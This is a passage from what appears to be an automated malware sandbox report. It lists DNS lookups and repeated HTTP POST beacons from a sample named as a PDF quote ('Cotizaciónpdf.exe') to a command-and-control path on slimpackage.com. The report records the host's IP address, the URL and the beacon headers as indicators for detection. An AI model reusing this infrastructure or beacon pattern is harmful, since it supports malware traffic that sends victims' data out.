                  Jan 14, 2022 17:29:16.754798889 CET192.168.2.58.8.8.80xc2dcStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:18.536864042 CET192.168.2.58.8.8.80xc671Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:23.424036980 CET192.168.2.58.8.8.80x2830Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:25.630590916 CET192.168.2.58.8.8.80x511bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:27.556257010 CET192.168.2.58.8.8.80x561bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:29.772454023 CET192.168.2.58.8.8.80x46baStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:32.703675032 CET192.168.2.58.8.8.80xe1d0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:34.722784042 CET192.168.2.58.8.8.80xf4acStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:36.260248899 CET192.168.2.58.8.8.80xd601Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:37.642805099 CET192.168.2.58.8.8.80xf120Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:38.999887943 CET192.168.2.58.8.8.80x4137Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:40.372648001 CET192.168.2.58.8.8.80xe792Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:41.774826050 CET192.168.2.58.8.8.80x5997Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:43.280211926 CET192.168.2.58.8.8.80x38e4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:44.712246895 CET192.168.2.58.8.8.80x8267Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:46.758122921 CET192.168.2.58.8.8.80xd0aeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:50.919126987 CET192.168.2.58.8.8.80xf5d9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:53.559356928 CET192.168.2.58.8.8.80x2566Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:55.574177027 CET192.168.2.58.8.8.80xf2bfStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:57.418695927 CET192.168.2.58.8.8.80xac0eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:59.970988035 CET192.168.2.58.8.8.80xcc3aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:01.880326033 CET192.168.2.58.8.8.80x2c7dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:03.246323109 CET192.168.2.58.8.8.80xf940Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:04.588593960 CET192.168.2.58.8.8.80xc907Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:06.287013054 CET192.168.2.58.8.8.80x402cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:07.919339895 CET192.168.2.58.8.8.80x6262Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:09.826633930 CET192.168.2.58.8.8.80xfc4bStandard query (0)slimpackage.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 14, 2022 17:28:13.115070105 CET8.8.8.8192.168.2.50xcc77No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:14.831212997 CET8.8.8.8192.168.2.50x2fa2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:16.466959953 CET8.8.8.8192.168.2.50xefadNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:18.784615993 CET8.8.8.8192.168.2.50x3ce6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:21.063589096 CET8.8.8.8192.168.2.50x8000No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:23.122594118 CET8.8.8.8192.168.2.50x4772No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:24.605462074 CET8.8.8.8192.168.2.50x76d2No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:25.956110001 CET8.8.8.8192.168.2.50x1ce3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:27.683886051 CET8.8.8.8192.168.2.50x2531No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:29.126961946 CET8.8.8.8192.168.2.50xdc7fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:30.458503962 CET8.8.8.8192.168.2.50x29b6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:31.827296972 CET8.8.8.8192.168.2.50xd171No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:35.069721937 CET8.8.8.8192.168.2.50xbf81No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:37.494354010 CET8.8.8.8192.168.2.50xd37bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:40.894728899 CET8.8.8.8192.168.2.50xef55No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:45.531521082 CET8.8.8.8192.168.2.50x734cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:47.250000954 CET8.8.8.8192.168.2.50x84bcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:48.810790062 CET8.8.8.8192.168.2.50x2c2bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:50.667985916 CET8.8.8.8192.168.2.50x1ed1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:52.315208912 CET8.8.8.8192.168.2.50xbf51No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:53.903908968 CET8.8.8.8192.168.2.50xf1f7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:55.332171917 CET8.8.8.8192.168.2.50x3666No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:57.485555887 CET8.8.8.8192.168.2.50x34aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:28:58.880289078 CET8.8.8.8192.168.2.50x1206No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:00.313199043 CET8.8.8.8192.168.2.50xbb58No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:01.693216085 CET8.8.8.8192.168.2.50x7fbaNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:03.226144075 CET8.8.8.8192.168.2.50x34baNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:05.325781107 CET8.8.8.8192.168.2.50xd94fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:06.909065008 CET8.8.8.8192.168.2.50x5a1bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:08.256097078 CET8.8.8.8192.168.2.50x2f60No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:11.142402887 CET8.8.8.8192.168.2.50x8dfbNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:14.052234888 CET8.8.8.8192.168.2.50xd123No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:16.775743008 CET8.8.8.8192.168.2.50xc2dcNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:18.556022882 CET8.8.8.8192.168.2.50xc671No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:23.441941023 CET8.8.8.8192.168.2.50x2830No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:25.648001909 CET8.8.8.8192.168.2.50x511bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:27.575892925 CET8.8.8.8192.168.2.50x561bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:29.789906025 CET8.8.8.8192.168.2.50x46baNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:32.720993996 CET8.8.8.8192.168.2.50xe1d0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:34.742059946 CET8.8.8.8192.168.2.50xf4acNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:36.279872894 CET8.8.8.8192.168.2.50xd601No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:37.662089109 CET8.8.8.8192.168.2.50xf120No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:39.019954920 CET8.8.8.8192.168.2.50x4137No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:40.392208099 CET8.8.8.8192.168.2.50xe792No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:41.792356014 CET8.8.8.8192.168.2.50x5997No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:43.299621105 CET8.8.8.8192.168.2.50x38e4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:44.731709957 CET8.8.8.8192.168.2.50x8267No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:46.777492046 CET8.8.8.8192.168.2.50xd0aeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:50.937889099 CET8.8.8.8192.168.2.50xf5d9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:53.576899052 CET8.8.8.8192.168.2.50x2566No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:55.593589067 CET8.8.8.8192.168.2.50xf2bfNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:57.436048031 CET8.8.8.8192.168.2.50xac0eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:29:59.990144014 CET8.8.8.8192.168.2.50xcc3aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:01.900036097 CET8.8.8.8192.168.2.50x2c7dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:03.264153004 CET8.8.8.8192.168.2.50xf940No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:04.710212946 CET8.8.8.8192.168.2.50xc907No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:06.306135893 CET8.8.8.8192.168.2.50x402cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:07.938632011 CET8.8.8.8192.168.2.50x6262No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                  Jan 14, 2022 17:30:09.846517086 CET8.8.8.8192.168.2.50xfc4bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • slimpackage.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.549754104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:13.315745115 CET1223OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 192
                  Connection: close
                  Jan 14, 2022 17:28:13.586972952 CET1223INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 16:28:12 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.549755104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:14.966907978 CET1224OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 192
                  Connection: close
                  Jan 14, 2022 17:28:15.236922026 CET1225INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 16:28:14 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.549768104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:30.598054886 CET1245OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:30.869498968 CET1245INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:29 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.549769104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:31.998392105 CET1246OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:32.371730089 CET1247INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:31 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.549772104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:35.257565022 CET1270OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:35.598879099 CET1270INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:34 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.549773104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:37.734698057 CET1271OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:38.027388096 CET1272INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:37 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.549774104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:44.091710091 CET1273OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:44.368436098 CET1273INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:43 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.549775104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:45.667839050 CET1274OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:46.295262098 CET1275INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:44 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.549776104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:47.384706974 CET1276OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:47.653799057 CET1276INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:46 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.549777104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:48.947782993 CET1277OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:49.225759983 CET1278INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:48 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.549778104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:50.801698923 CET1279OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:51.116813898 CET1279INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:50 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.549780104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:52.454046965 CET1290OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:52.726126909 CET1290INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:51 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.549757104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:16.603027105 CET1225OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:16.872795105 CET1226INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:15 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.549781104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:54.036242008 CET1291OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:54.306258917 CET1292INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:53 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.549782104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:55.470160961 CET1293OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:55.988012075 CET1293INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:54 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.549784104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:57.622553110 CET1299OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:57.906794071 CET1306INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:56 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.549791104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:28:59.015616894 CET1319OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:28:59.285082102 CET1322INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:58 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.549799104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:29:00.450387001 CET1335OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:29:00.713493109 CET1340INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:28:59 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.549806104.223.93.10580C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 17:29:01.829359055 CET1352OUTPOST /slimmain/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: slimpackage.com
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: CC3B1AE
                  Content-Length: 165
                  Connection: close
                  Jan 14, 2022 17:29:02.098814964 CET1356INHTTP/1.1 200 OK
                  Date: Fri, 14 Jan 2022 16:29:01 GMT
                  Server: Apache
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
